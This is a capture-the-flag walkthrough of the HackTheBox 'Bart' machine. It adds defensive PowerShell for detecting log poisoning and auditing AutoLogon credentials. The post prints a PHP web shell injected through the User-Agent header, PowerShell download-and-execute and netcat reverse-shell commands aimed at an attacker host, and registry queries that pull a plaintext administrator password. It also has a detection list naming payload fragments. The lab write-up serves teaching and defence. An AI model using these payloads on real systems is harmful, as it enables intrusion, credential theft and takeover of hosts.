We covered log file poisoning and Windows privilege escalation by abusing the Windows AutoLogon feature, which stores credentials in plaintext in the registry. This was part of HackTheBox Bart.

Bart is a Windows machine of medium difficulty.

Initial Enumeration

I started with an Nmap scan, which revealed an open port 80 running Microsoft Internet Information Services (IIS) version 10. The scan also indicated a redirect to forum.bart.htb, so I added this and other related hostnames (monitor.bart, internal01.bart) to my /etc/hosts file. Browsing to forum.bart.htb led to a WordPress site. I attempted to access wp-admin but encountered an internal server error. By viewing the page source, I found an email address for a developer, Harvey Potter (H.Potter@...), and deduced the email naming convention for other team members (e.g., S.Brown, D.Simons, R.Hilton).

Directory Brute-forcing and Login

I used gobuster to find hidden directories and discovered /monitor and /forum. Navigating to bart.htb/monitor redirected to a login form. Using the "Forgot Password" functionality, I confirmed that the username format was the first name (e.g., "Harvey"). I guessed the password for "Harvey" as "Potter" (his surname) and successfully logged in. I guessed manually rather than brute-forcing because the form carried a CSRF token, which would have complicated automated attempts.

Internal Chat and Source Code Analysis

Inside the monitor portal, an “Internal Chat” link led to internal01.bart. This new page had another login form for a “Simple Chat” application. By inspecting the CSS, I found the author of the application. Googling “Simple Chat” led me to its source code on GitHub. The source code revealed a registration functionality (register.php) that accepted uname and password parameters via a POST request. I used curl to send a POST request and register a new user.

Log File Poisoning

After logging into the chat application, I noticed a "Log" button. Intercepting the request with Burp Suite showed that clicking "Log" sent a request to log/log.php, which wrote details (date, username, user-agent) to log/log.txt. The username was hardcoded as "Harvey". Because log.php renders the log file's contents back through the PHP interpreter, anything written into the log is parsed as PHP, which makes this a log file poisoning opportunity. By manipulating the User-Agent header, I could inject PHP code. First, I injected a simple PHP shell, <?php system($_GET['CMD']); ?>, into the User-Agent. Accessing log/log.php?CMD=whoami confirmed command execution.
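From the defender's side, the tell-tale sign of this attack is interpreter syntax inside a field that should only ever hold a browser identifier. The following PowerShell is an added example, not code from the original write-up or from Simple Chat: it scans a log in the "date | user | user-agent" layout (the separator and the sample entries are constructed assumptions) and reports entries whose User-Agent carries PHP or PowerShell payload fragments.

```powershell
# Added example, not part of the original write-up: detect User-Agent based
# poisoning in a Simple Chat style log.txt. The "date | user | user-agent"
# line layout and the sample entries below are constructed assumptions.
function Test-LogPoisoning {
    param([string[]]$Lines)

    # Fragments that never belong in a genuine browser User-Agent string.
    $Markers = @('<?php', '<?=', 'system(', 'passthru(', 'shell_exec(',
                 'IEX ', 'DownloadString', '-ep bypass')

    foreach ($Line in $Lines) {
        $Fields = $Line -split ' \| ', 3
        if ($Fields.Count -lt 3) { continue }   # skip blank or malformed lines
        $UserAgent = $Fields[2]

        $Hits = @($Markers | Where-Object {
            $UserAgent.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0
        })
        if ($Hits.Count -gt 0) {
            [pscustomobject]@{
                Timestamp = $Fields[0]
                User      = $Fields[1]
                Markers   = ($Hits -join ', ')
                UserAgent = $UserAgent
            }
        }
    }
}

# Constructed sample log; only the second and third entries are malicious.
$SampleLog = @(
    '25/08/2019 16:01:10 | Harvey | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/68.0',
    '25/08/2019 16:02:44 | Harvey | <?php system($_GET[''CMD'']); ?>',
    '25/08/2019 16:03:12 | Harvey | powershell -ep bypass -C "IEX (New-Object Net.WebClient).DownloadString(''http://<attacker_ip>:8000/shell.ps1'')"'
)

Test-LogPoisoning -Lines $SampleLog | Format-Table -AutoSize
```

Detection is the second line of defence; the root cause is that the application writes a raw request header into a file the PHP interpreter later parses, so the fix is to keep logs outside the web root, write them with a non-executable extension, and never include them.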

Gaining Initial Access (Reverse Shell)

I set up a Python HTTP server to host a Nishang PowerShell reverse shell script (Invoke-PowerShellTcp.ps1, copied as shell.ps1). I modified the script with my IP address and a listening port. Using the log poisoning vulnerability, I crafted a PowerShell command to download and execute the reverse shell script from my server. I started a netcat listener and successfully received a reverse shell.

Privilege Escalation

The initial shell was running as a low-privilege user. I checked privileges with whoami /priv and found SeImpersonatePrivilege was enabled, suggesting Juicy Potato could be an option, but I chose a different path. I mentioned that running WinPEAS would reveal an "AutoLogon" misconfiguration where administrator credentials are stored in plaintext in the registry. The initial netcat shell was 32-bit, causing issues with some commands. I downloaded a 64-bit nc64.exe to the target machine and started a new, more stable 64-bit reverse shell.

I then queried the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon to retrieve the plaintext DefaultUserName (Administrator) and DefaultPassword. Using PowerShell, I created credential objects with the retrieved administrator username and password. I prepared another Nishang reverse shell script (shell1.ps1) with a different port. Finally, I used Invoke-Command with the -Credential parameter (using the admin credentials) and -ComputerName localhost to download and execute the new reverse shell script. This provided a new reverse shell running as the Administrator, allowing me to access the root flag.
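A defender-side check for the misconfiguration described above, added here and not part of the original write-up: it reads the Winlogon key, reports whether a plaintext DefaultPassword is present without echoing the value, and previews its removal. It assumes an elevated PowerShell session on the host being audited.

```powershell
# Added example, not part of the original write-up: audit the Winlogon key
# for the plaintext AutoLogon credentials abused above and stage their removal.
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonExposure {
    param([string]$Path = $WinlogonKey)

    $Props = Get-ItemProperty -Path $Path -ErrorAction Stop
    # A missing value reads as $null, so this is $false on a clean host.
    $HasPlaintext = -not [string]::IsNullOrEmpty($Props.DefaultPassword)
    $Severity = if ($HasPlaintext) { 'High' } else { 'None' }

    [pscustomobject]@{
        AutoAdminLogon    = $Props.AutoAdminLogon      # '1' when auto-logon is on
        DefaultDomainName = $Props.DefaultDomainName
        DefaultUserName   = $Props.DefaultUserName
        PlaintextPassword = $HasPlaintext              # the finding; value is not echoed
        Severity          = $Severity
    }
}

$Finding = Get-AutoLogonExposure
$Finding | Format-List

# Remediation, run elevated: remove the plaintext value and turn auto-logon off.
# -WhatIf previews the change; drop it to apply.
if ($Finding.PlaintextPassword) {
    Remove-ItemProperty -Path $WinlogonKey -Name DefaultPassword -WhatIf
    Set-ItemProperty -Path $WinlogonKey -Name AutoAdminLogon -Value '0' -WhatIf
}
```

If auto-logon is genuinely required, the Sysinternals Autologon tool stores the password as an LSA secret rather than a readable registry string, but a local administrator can still recover it, so on a server the real fix is to disable auto-logon altogether.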

Technical Commands

  • nmap <target_ip>
  • cat /etc/hosts
  • gobuster dir -u http://forum.bart.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt --exclude-length 150,693
  • curl -X POST -d "uname=myname&password=password123" http://internal01.bart/simplechat/register.php
  • http://internal01.bart/log/log.txt (Accessing log file)
  • http://internal01.bart/log/log.php (Accessing PHP info via poisoned log)
  • http://internal01.bart/log/log.php?CMD=whoami (Executing command via poisoned log)
  • ls
  • cd shells
  • cd nishang
  • cp Invoke-PowerShellTcp.ps1 ../../shell.ps1
  • ifconfig or ip a
  • python3 -m http.server 8000
  • powershell -ep bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell.ps1')" (PowerShell download and execute via log poisoning)
  • nc -lvnp 4545 (Netcat listener)
  • whoami /priv
  • powershell -c "Invoke-WebRequest -Uri http://<attacker_ip>:8000/nc64.exe -OutFile nc64.exe" (PowerShell command to download nc64.exe)
  • ./nc64.exe <attacker_ip> 4546 -e powershell.exe (To start a 64-bit reverse shell)
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName (Registry query for AutoLogon credentials)
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
  • $UserName = "Bart\Administrator" (PowerShell command to create credential object)
  • $Password = ConvertTo-SecureString "THE_RETRIEVED_PASSWORD" -AsPlainText -Force
  • $Cred = New-Object System.Management.Automation.PSCredential($UserName, $Password)
  • cp shell.ps1 shell1.ps1
  • nano shell1.ps1
  • nc -lvnp 4547
  • Invoke-Command -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell1.ps1') } -Credential $Cred -ComputerName localhost (PowerShell command to execute reverse shell as Administrator)
  • cd ..
  • ls
  • cd Desktop
  • type root.txt

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.